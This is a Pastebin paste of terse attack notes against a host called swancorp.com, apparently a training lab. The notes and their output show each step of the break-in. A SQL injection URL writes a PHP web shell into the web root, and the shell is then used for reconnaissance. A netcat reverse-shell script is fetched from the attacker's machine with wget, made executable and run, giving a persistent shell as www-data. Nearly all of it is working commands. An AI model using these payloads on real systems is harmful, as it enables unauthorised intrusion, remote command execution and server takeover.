Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Using php scripting manipulation through the SQL access, used the following script code to create a backdoor file called backdoor.php
- http://swancorp.com/swancorp/timecards/edit_type.php?type_id=740%20union%20all%20select%20%22%3C?php%20echo%20shell_exec($_GET[%27cmd%27]);?%3E%22%20into%20OUTFILE%20%27/var/www/html/swancorp/backdoor.php%27;#
- Then used following the php scripts to get differing results:
- Directory list
- http://swancorp.com/swancorp/backdoor.php?cmd=ls
- about.html backdoor.php cache contact.html css evilbackdoor.php fonts images index.html js nagios_exploit.sh portfolio.html sass swancorp.sh timecards
- Router info
- http://swancorp.com/swancorp/backdoor.php?cmd=route
- Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface default 10.10.127.1 0.0.0.0 UG 0 0 0 eth0 10.10.0.0 * 255.255.0.0 U 0 0 0 eth0
- Linux version
- http://swancorp.com/swancorp/backdoor.php?cmd=cat /etc/issue
- Ubuntu 14.04.5 LTS \n \l
- Using the following backdoor commands through the host shell first and then the target php access next, attempted to get a connection from the target system to the host system.
- nc -lvp 12345
- http://swancorp.com/swancorp/backdoor.php?cmd=nc 10.10.127.89 12345
- root@kali-linux:~# nc -lvp 12345
- listening on [any] 12345 ...
- connect to [10.10.127.89] from swancorp.com [10.10.127.209] 54630
- Made a script file containing the code:
- #!/bin/sh
- nc.traditional -e /bin/sh 10.10.127.89 12345
- This was to enable a constant connection between host and target machines
- Then used the following php command to have the script downloaded:
- http://swancorp.com/swancorp/backdoor.php?cmd=wget -P /tmp/ http://10.10.127.89/ncscript.sh
- Verified that the file was successfully transfered to the target system using:
- http://swancorp.com/swancorp/backdoor.php?cmd=ls /tmp/
- hsperfdata_tomcat7 index.html ncscript tomcat7-tomcat7-tmp vmware-root
- Then modified the script file's permissions on the target system using:
- http://swancorp.com/swancorp/backdoor.php?cmd=chmod 777 /tmp/ncscript
- Executed the script using the command:
- http://swancorp.com/swancorp/backdoor.php?cmd=sh /tmp/ncscript
- Used simple terminal commands to verify that the connection is constant.
- whoami
- www-data
- ifconfig
- eth0 Link encap:Ethernet HWaddr 00:50:56:b8:1e:8e
- inet addr:10.10.127.209 Bcast:10.10.255.255 Mask:255.255.0.0
- inet6 addr: fe80::250:56ff:feb8:1e8e/64 Scope:Link
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:921352 errors:0 dropped:1113 overruns:0 frame:0
- TX packets:113252 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:124236261 (124.2 MB) TX bytes:11509356 (11.5 MB)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement